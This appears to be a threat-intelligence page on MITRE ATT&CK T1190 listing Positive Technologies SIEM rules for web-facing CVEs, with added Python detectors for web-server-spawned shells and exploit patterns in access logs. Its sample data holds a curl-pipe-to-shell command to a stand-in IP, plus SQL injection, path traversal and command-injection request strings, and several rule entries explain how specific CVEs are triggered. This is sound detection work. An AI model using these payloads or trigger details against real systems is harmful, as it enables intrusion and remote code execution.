T1190: Exploit Public-Facing Application
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets. Depending on the flaw being exploited, this may also involve Exploitation for Defense Evasion or Exploitation for Client Execution.
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
wallarm: PT-CR-2481: Wallarm_RCE_Attack_Detected: An attempted RCE attack was detected by Wallarm
wallarm: PT-CR-2483: Wallarm_Attack_Detected: An attempted attack on a web application was detected by Wallarm
wallarm: PT-CR-2478: Wallarm_SQL_Injection_Detected: An attempted SQL injection attack was detected by Wallarm
wallarm: PT-CR-2482: Wallarm_XSS_Attack_Detected: An attempted cross-site scripting (XSS) attack was detected by Wallarm
wallarm: PT-CR-2479: Wallarm_Path_Traversal_Detected: An attempted path traversal attack was detected by Wallarm
unix_mitre_attck_initial_access: PT-CR-288: Unix_Suspicious_Activity_By_Web_User: Suspicious commands were executed on behalf of a web service account: local reconnaissance commands, commands associated with security analysis tools, or other commands whose current working directory matches the web server directory
vulnerabilities: PT-CR-2405: CVE_2024_24919_CheckPoint_Information_Disclosure: Exploitation of the CVE-2024-24919 vulnerability, which allows attackers to read any file on Check Point firewall devices without authorization. The vulnerability affects Check Point software with the IPSec VPN, Remote Access VPN, or Mobile Access blades enabled.
vulnerabilities: PT-CR-1994: CVE_2023_22515_Confluence: Exploitation of vulnerability CVE-2023-22515 in Confluence, which allows creating administrator accounts on the server without authentication
vulnerabilities: PT-CR-2455: CVE_2024_4577_PHP_CGI_RCE: Possible exploitation of vulnerability CVE-2024-4577 in PHP for Windows where PHP runs in CGI mode. The vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on the web server. At the time this rule was developed, the attack could be reproduced only on Windows systems with a Chinese (simplified or traditional) or Japanese locale installed. The root cause is incorrect handling of the Unicode character 0xAD (soft hyphen), which the CGI engine interprets as a regular hyphen; this lets attackers pass additional command-line arguments starting with a hyphen to PHP.
vulnerabilities: PT-CR-2065: CVE_2023_46604_ActiveMQ_RCE: Possible exploitation of vulnerability CVE-2023-46604 in Apache ActiveMQ for remote code execution
vulnerabilities: PT-CR-2281: CVE_2024_23897_Jenkins_Arbitrary_File_Read: Exploitation of the CVE-2024-23897 vulnerability in Jenkins. An attacker can read an arbitrary file via the Jenkins command-line interface by prefixing the file path with the "@" character.
vulnerabilities: PT-CR-3142: Uptime_Kuma_RCE_Via_Fake_Chrome: Possible exploitation of an Uptime Kuma vulnerability that allows attackers to remotely execute arbitrary code. Uptime Kuma lets a user specify the path to a Chrome or Chromium-based browser and perform a test run of it. An attacker can place an executable masquerading as Chrome in an allowlisted directory and have it run under the server account.
vulnerabilities: PT-CR-3348: CVE_2025_64459_Django_SQL_Injection: Possible attempt to exploit the CVE-2025-64459 vulnerability in Django. Incorrect dictionary processing allows attackers to inject an internal parameter ("_connector" or "_negated") via HTTP requests and manipulate database query logic.
vulnerabilities: PT-CR-1917: CMS_1C_Bitrix_Race_Landing_Exploit: Possible exploitation of a vulnerability in the landing module of the 1C-Bitrix: Site Management CMS
vulnerabilities: PT-CR-2836: CVE_2024_9474_PaloAlto_Command_Injection: Exploitation of vulnerability CVE-2024-9474, which allows users authenticated to Palo Alto Networks PAN-OS to execute commands as root. The vulnerability is often exploited together with CVE-2024-0012, which allows bypassing Palo Alto Networks authentication.
vulnerabilities: PT-CR-3038: CVE_2025_33073_SMB_Client_Elevation: Exploitation of the CVE-2025-33073 vulnerability in Windows NTLM authentication. The vulnerability allows an attacker to bypass existing credential reflection mitigations and remotely obtain a SYSTEM token. The attacker registers a fake DNS record with a specific name pattern, points it at an attacker-controlled IP address, and coerces the target system to authenticate to that address.
vulnerabilities: PT-CR-2943: CVE_2025_24813_Tomcat_RCE: Attempt to exploit the CVE-2025-24813 vulnerability in Apache Tomcat, which allows remote arbitrary code execution. Using HTTP PUT, the attacker uploads a serialized session file to the server and then, with a GET request whose JSESSIONID value is the name of that file, triggers deserialization and payload execution.
vulnerabilities: PT-CR-2776: CVE_2024_49040_Exchange_Sender_Address_Spoffing: Mismatch between the SMTP "From" and "Return-Path" headers in MS Exchange Server transport events. This may indicate exploitation of vulnerability CVE-2024-49040 (increasing user trust in a phishing message by replacing the displayed sender address with a legitimate one).
vulnerabilities: PT-CR-2247: CVE_2023_27350_PaperCut_Authentication_Bypass: Suspicious process start chain for the PaperCut NG/MF application. This may indicate exploitation of the CVE-2023-27350 vulnerability and malicious code execution through built-in PaperCut NG/MF functionality: print scripts and integration with third-party tools for authorization.
vulnerabilities: PT-CR-1983: Possible_CVE_2023_20198_Cisco_IOS_XE: Possible exploitation of vulnerability CVE-2023-20198 in Cisco IOS XE, associated with privilege escalation by creating a new administrator account
vulnerabilities: PT-CR-3157: CVE_2025_59287_WSUS_RCE: Exploitation of the RCE vulnerability CVE-2025-59287 in Windows Server Update Services (WSUS)
vulnerabilities: PT-CR-2293: CVE_2024_27198_TeamCity_Authentication_Bypass: Exploitation of vulnerability CVE-2024-27198 in TeamCity. The vulnerability allows an attacker to bypass authentication and create a new TeamCity user with administrator permissions, or obtain an access token for a user. This can then be used to execute commands remotely.
vulnerabilities: PT-CR-2091: CVE_2022_26134_Confluence_RCE: Exploitation of the CVE-2022-26134 vulnerability in Confluence, which allows attackers to inject OGNL expressions and remotely execute arbitrary code without authenticating to the server.
vulnerabilities: PT-CR-3066: CVE_2025_47286_iTop_RCE: Exploitation of the CVE-2025-47286 vulnerability in Combodo iTop. Incorrect processing of the $sMysqldumpCommand variable, which specifies the directory containing the mysqldump executable, allows attackers to achieve remote code execution (RCE) by changing the configuration parameter value to an arbitrary command.
vulnerabilities: PT-CR-3078: CVE_2024_38077_RCE_RDP_Licensing_Server: Exploitation of the CVE-2024-38077 vulnerability in the Windows Remote Desktop Licensing Service. The vulnerability allows attackers to remotely execute arbitrary code without authentication and gain complete control over the system.
vulnerabilities: PT-CR-2431: Subrule_CVE_2024_21683_Confluence_RCE: Successful POST request from an authenticated user to the Confluence "Add a new language" function in the "Code" macro settings section. This may indicate exploitation of vulnerability CVE-2024-21683, which allows arbitrary code execution on the Confluence server host.
vulnerabilities: PT-CR-3022: CVE_2025_1974_Kubernetes_IngressNightmare: Attempt to exploit one of the IngressNightmare vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, or CVE-2025-1974). These critical vulnerabilities allow injection of arbitrary directives into the Ingress NGINX Controller configuration or arbitrary code execution in the Ingress NGINX Controller container without prior authentication.
vulnerabilities: PT-CR-2873: CVE_2024_47575_FortiJump_FortiManager_RCE: An unregistered device was added to the FortiManager centralized management system. This may indicate exploitation of the CVE-2024-47575 vulnerability, which allows remote code execution on the FortiManager server: an attacker can use crafted FGFM requests to execute unauthorized code with system privileges.
vulnerabilities: PT-CR-2942: Subrule_CVE_2025_24813_Tomcat_RCE: Exploitation of the CVE-2025-24813 vulnerability in Apache Tomcat, which allows remote arbitrary code execution. Using HTTP PUT, the attacker uploads a serialized session file to the server and then, with a GET request whose JSESSIONID value is the name of that file, triggers deserialization and payload execution.
vulnerabilities: PT-CR-3003: CVE_2025_32433_Erlang_SSH_RCE: An Erlang server process accepted an incoming connection and then created a reverse shell or accessed a sensitive file. This may indicate exploitation of the CVE-2025-32433 vulnerability, which allows arbitrary code execution with SSH daemon privileges without authentication.
vulnerabilities: PT-CR-3076: CVE_2025_53770_SharePoint_Unauthenticated_RCE: Attempt to exploit or probe for the CVE-2025-53770 vulnerability in SharePoint. The vulnerability allows arbitrary code execution without authentication via a payload-carrying POST request to the ToolPane.aspx component with the Referer header set to "/_layouts/signout.aspx".
vulnerabilities: PT-CR-2064: Subrule_ActiveMQ_Connect: Connection to the Apache ActiveMQ service
vulnerabilities: PT-CR-2486: Sharepoint_Remote_Code_Execution: Exploitation of vulnerability CVE-2024-38023, CVE-2024-38024, or CVE-2024-38094 in Microsoft SharePoint Server. These vulnerabilities allow an authenticated user with site owner permissions to upload a malicious file to the target SharePoint server and issue API requests that trigger deserialization of the file parameters, resulting in remote execution of arbitrary code.
vulnerabilities: PT-CR-2433: CVE_2024_21683_Confluence_RCE: Exploitation of vulnerability CVE-2024-21683 in Confluence. The vulnerability allows an authenticated user to upload and execute arbitrary malicious code through the "Add a new language" function in the "Code" macro settings section.
microsoft_exchange: PT-CR-1476: Exchange_ProxyNotShell: The ProxyNotShell vulnerability was exploited using the Metasploit module
mitre_attck_execution: PT-CR-649: Suspicious_Child_From_Webserver_Process: A user started a process from a parent web server process
mitre_attck_execution: PT-CR-645: Recon_Via_Webserver_Process: A process was started from a parent web server process (reconnaissance via the web server)
web_servers_abnormal_activity: PT-CR-3156: Possible_Web_Attack: Attempt to exploit a critical vulnerability (XSS, SQL injection, file inclusion, or path traversal): a suspicious pattern was detected in an HTTP request
process_chains_and_logons: PT-CR-3340: Suspicious_Node_Process_Chain: Suspicious process chain: the Node.js interpreter started a command shell, which may indicate exploitation of vulnerabilities in server-side JavaScript applications and frameworks, such as the CVE-2025-55182 vulnerability in React or Next.js
process_chains_and_logons: PT-CR-953: Suspicious_Webserver_Process_Chain: Suspicious process start chain for web server utilities
pt_application_firewall: PT-CR-1882: PTAF_XSS_Attack_Detected: PT AF detected an attempted cross-site scripting (XSS) attack
pt_application_firewall: PT-CR-1896: PTAF_Path_Traversal_Detected: PT AF detected an attempted path traversal attack
pt_application_firewall: PT-CR-1897: PTAF_LFI_Detected: PT AF detected an attempted exploitation of a Local File Inclusion (LFI) vulnerability
pt_application_firewall: PT-CR-1907: PTAF_CVE_Detected: PT AF detected a vulnerability exploitation attempt
pt_application_firewall: PT-CR-639: PTAF_Alert_Detected: A PT AF rule was triggered
pt_application_firewall: PT-CR-1884: PTAF_SQL_Injection_Detected: PT AF detected an attempted SQL injection attack
pt_application_firewall: PT-CR-637: PTAF_Reflected_File_Download_Detected: PT AF detected a reflected file download (RFD) attack
network_devices_abnormal_activity: PT-CR-475: Smart_Install_Usage: Possible vulnerability exploitation in Cisco Smart Install
postfix: PT-CR-2715: Postfix_Shellshock_On_Patched_Version: Possible attempt to exploit the CVE-2014-6271 (Shellshock) vulnerability against Postfix versions in which the vulnerability is already fixed
pt_nad: PT-CR-730: NAD_CVE_On_Vulnerable_Host: PT NAD detected an attempt to exploit a vulnerability
bitbucket: PT-CR-2541: Bitbucket_Possible_RCE_via_API: A request was sent to a Bitbucket host. The "exec=" pattern in a request parameter indicates possible exploitation of the CVE-2022-36804 vulnerability in Bitbucket Server, which allows attackers to execute arbitrary code on the server.
network_devices_compromise: PT-CR-571: Cisco_IOS_Change_Config_By_SNMP: A device configuration file was modified from an untrusted host
network_devices_compromise: PT-CR-576: CheckPoint_SmartConsole_Connection: A connection from an untrusted host using the Check Point SmartConsole utility was detected
network_devices_compromise: PT-CR-575: Smart_Install_Exploitation_Tool_Usage: Use of the Smart Install Exploitation Tool was detected
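Several of the rules above (PT-CR-288, PT-CR-645, PT-CR-649, PT-CR-953, PT-CR-3340) share one detection idea: a web server or server-side JavaScript runtime should almost never spawn a shell, and reconnaissance commands should not run as the web service account or from the web root. The following is an added example, not MaxPatrol SIEM rule code or any Positive Technologies code, that implements that logic in Python over constructed process-creation events. The event field names, the process and account sets, the web-root prefixes and the allowlist are all assumptions to tune per environment.

```python
"""Process-chain detection for shells spawned by web-facing processes (added example)."""
import ntpath

# Assumed sets; tune to the environment. "java" covers Tomcat/Confluence/Jenkins-style servers.
WEB_PARENTS = {"w3wp.exe", "httpd", "apache2", "nginx", "php-fpm", "tomcat", "java", "node", "node.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash", "zsh"}
RECON = {"whoami", "whoami.exe", "id", "uname", "hostname", "ifconfig", "ip",
         "ipconfig.exe", "net.exe", "systeminfo.exe", "netstat.exe", "ps"}
WEB_ACCOUNTS = {"www-data", "apache", "nginx", "iis apppool\\defaultapppool",
                "nt authority\\network service"}
WEB_ROOTS = ("/var/www", "/srv/www", "c:\\inetpub\\wwwroot")
# (parent, child, command-line substring) chains that are expected here, e.g. CI builds.
ALLOWLIST = {("node.exe", "cmd.exe", "npm run build")}


def image_name(path: str) -> str:
    # ntpath splits on both '\\' and '/', so one helper covers Windows and POSIX paths.
    return ntpath.basename(path).lower()


def classify(ev: dict):
    """Return a verdict label for one process-creation event, or None if benign."""
    parent, child = image_name(ev["parent_image"]), image_name(ev["image"])
    cmdline = ev.get("command_line", "").lower()
    user = ev.get("user", "").lower()
    cwd = ev.get("cwd", "").lower()
    if any(parent == p and child == c and s in cmdline for p, c, s in ALLOWLIST):
        return None
    if parent in {"node", "node.exe"} and child in SHELLS:
        return "node_spawned_shell"          # cf. PT-CR-3340
    if parent in WEB_PARENTS and child in SHELLS:
        return "webserver_spawned_shell"     # cf. PT-CR-649 / PT-CR-953
    if child in RECON and (user in WEB_ACCOUNTS or cwd.startswith(WEB_ROOTS)):
        return "recon_as_web_user"           # cf. PT-CR-288 / PT-CR-645
    return None


def detect(events):
    """Run classify() over a stream of events; return (event id, verdict) pairs."""
    return [(ev["id"], verdict) for ev in events if (verdict := classify(ev))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami", "user": r"IIS APPPOOL\DefaultAppPool", "cwd": r"C:\inetpub\wwwroot"},
    {"id": 2, "parent_image": "/usr/sbin/apache2", "image": "/usr/bin/php",
     "command_line": "php-cgi", "user": "www-data", "cwd": "/var/www/html"},
    {"id": 3, "parent_image": "/usr/bin/node", "image": "/bin/sh",
     "command_line": 'sh -c "curl -s http://203.0.113.9/x | sh"', "user": "app", "cwd": "/srv/app"},
    {"id": 4, "parent_image": "/bin/bash", "image": "/usr/bin/id",
     "command_line": "id", "user": "www-data", "cwd": "/var/www/html"},
    {"id": 5, "parent_image": "/usr/lib/systemd/systemd", "image": "/usr/bin/id",
     "command_line": "id", "user": "root", "cwd": "/"},
    {"id": 6, "parent_image": r"C:\Program Files\nodejs\node.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /d /s /c npm run build", "user": "ci-runner", "cwd": r"C:\agent\work"},
]

if __name__ == "__main__":
    for event_id, verdict in detect(SAMPLE_EVENTS):
        print(event_id, verdict)
```

Events 1, 3 and 4 fire; event 2 (Apache handing off to PHP) and event 5 (root running `id` outside the web root) do not, and event 6 is suppressed by the allowlist. In production the allowlist is where most tuning effort goes: without it a Node.js build step or a PHP application legitimately calling `sh -c` will drown the signal.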
Detection
| ID | Data source and component | Description |
|---|---|---|
| DS0015 | Application Log: Application Log Content | Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation. |
| DS0029 | Network Traffic: Network Traffic Content | Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads. For example, monitor for successively chained functions that adversaries commonly abuse (i.e., gadget chaining) through unsafe deserialization to exploit publicly facing applications for initial access. |
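The request-content inspection described for DS0015 and DS0029 is what the Wallarm, PT AF and "vulnerabilities" rules above do in practice. The following is an added example in Python, not code from MITRE, Positive Technologies or any of the products named, that runs a few of those patterns over constructed access-log records: generic SQL injection and path traversal strings, the SharePoint ToolPane.aspx POST with a signout.aspx Referer (CVE-2025-53770), an "exec=" parameter sent to a Bitbucket host (CVE-2022-36804), the Django "_connector"/"_negated" parameters (CVE-2025-64459), and the two-step Tomcat correlation (CVE-2025-24813), where a PUT of a session file is followed by a GET whose JSESSIONID names that file. The JSON record shape, its field names, the regexes and every sample record are assumptions constructed for this example.

```python
"""Exploit-artifact inspection over constructed access-log records (added example)."""
import json
import re
from urllib.parse import parse_qs, unquote

SQLI_RE = re.compile(r"(?i)(union\s+(all\s+)?select|\bor\s+\d+\s*=\s*\d+|'\s*or\s*'|sleep\s*\(|;\s*drop\s+table)")
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|/etc/passwd|\\windows\\win\.ini)", re.IGNORECASE)
JSESSION_RE = re.compile(r"JSESSIONID=([^;\s]+)")


def decode(s: str) -> str:
    # Two rounds of percent-decoding catch %252e-style double encoding (assumption: two suffice).
    return unquote(unquote(s))


def inspect(records):
    """Return (line, finding) pairs. Records are dicts with line, src, host, method, path, referer, cookie."""
    findings = []
    pending_session_puts = {}  # (src, uploaded file stem) -> line of the PUT, for Tomcat correlation
    for rec in records:
        n, method, src = rec["line"], rec["method"], rec["src"]
        raw_path, _, raw_query = rec["path"].partition("?")
        path, query = decode(raw_path), decode(raw_query)
        params = parse_qs(query, keep_blank_values=True)
        target = path + ("?" + query if query else "")
        referer = rec.get("referer", "").lower()
        host = rec.get("host", "").lower()

        if SQLI_RE.search(target):
            findings.append((n, "sqli_pattern"))
        if TRAVERSAL_RE.search(target):
            findings.append((n, "path_traversal"))
        if method == "POST" and path.lower().endswith("/toolpane.aspx") \
                and referer.endswith("/_layouts/signout.aspx"):
            findings.append((n, "cve_2025_53770_sharepoint"))
        if "exec" in params and "bitbucket" in host:
            findings.append((n, "cve_2022_36804_bitbucket"))
        if params.keys() & {"_connector", "_negated"}:
            findings.append((n, "cve_2025_64459_django"))

        # Tomcat: remember PUTs of *.session files per source, then match a later GET's JSESSIONID.
        if method == "PUT" and path.lower().endswith(".session"):
            stem = path.rsplit("/", 1)[-1][:-len(".session")]
            pending_session_puts[(src, stem)] = n
        elif method == "GET":
            m = JSESSION_RE.search(rec.get("cookie", ""))
            if m:
                put_line = pending_session_puts.get((src, m.group(1).lstrip(".")))
                if put_line is not None:
                    findings.append((n, f"cve_2025_24813_tomcat(put_line={put_line})"))
    return findings


# Constructed sample log (JSON lines), not captured traffic.
SAMPLE_LOG = """\
{"line":1,"src":"203.0.113.7","host":"shop.example.test","method":"GET","path":"/products?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users--","referer":"","cookie":""}
{"line":2,"src":"203.0.113.7","host":"shop.example.test","method":"GET","path":"/download?file=..%2F..%2F..%2Fetc%2Fpasswd","referer":"","cookie":""}
{"line":3,"src":"198.51.100.4","host":"sp.example.test","method":"POST","path":"/_layouts/15/ToolPane.aspx?DisplayMode=Edit","referer":"https://sp.example.test/_layouts/signout.aspx","cookie":""}
{"line":4,"src":"198.51.100.9","host":"bitbucket.example.test","method":"GET","path":"/rest/api/latest/projects/X/repos/y/archive?exec=id","referer":"","cookie":""}
{"line":5,"src":"198.51.100.9","host":"api.example.test","method":"GET","path":"/items/?_connector=OR&name=x","referer":"","cookie":""}
{"line":6,"src":"192.0.2.55","host":"tomcat.example.test","method":"PUT","path":"/uploads/evil.session","referer":"","cookie":""}
{"line":7,"src":"192.0.2.55","host":"tomcat.example.test","method":"GET","path":"/index.jsp","referer":"","cookie":"JSESSIONID=.evil"}
{"line":8,"src":"192.0.2.80","host":"shop.example.test","method":"GET","path":"/products?id=42","referer":"https://shop.example.test/","cookie":"JSESSIONID=ABC123"}
"""


def load(text: str):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def run_sample():
    return inspect(load(SAMPLE_LOG))


if __name__ == "__main__":
    for line, finding in run_sample():
        print(line, finding)
```

Lines 1 through 5 each match a stateless pattern; line 7 fires only because line 6 from the same source was remembered, which is the part a stateless WAF signature cannot express and why the rule set above carries a separate subrule for the Tomcat PUT. Line 8, a normal request with a normal session cookie, produces nothing. The generic SQLi and traversal regexes are deliberately narrow; a real deployment would use the WAF's rule set and keep this kind of hand-written logic for the product-specific correlations.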
Mitigation
| ID | Name | Description |
|---|---|---|
| M1016 | Vulnerability Scanning | Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure. |
| M1026 | Privileged Account Management | Using least privilege for service accounts limits the permissions an exploited process gets on the rest of the system. |
| M1030 | Network Segmentation | Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure. |
| M1048 | Application Isolation and Sandboxing | Application isolation limits what other processes and system features the exploited target can access. |
| M1050 | Exploit Protection | Web Application Firewalls may be used to limit exposure of applications and prevent exploit traffic from reaching the application. |
| M1051 | Update Software | Update software regularly by employing patch management for externally exposed applications. |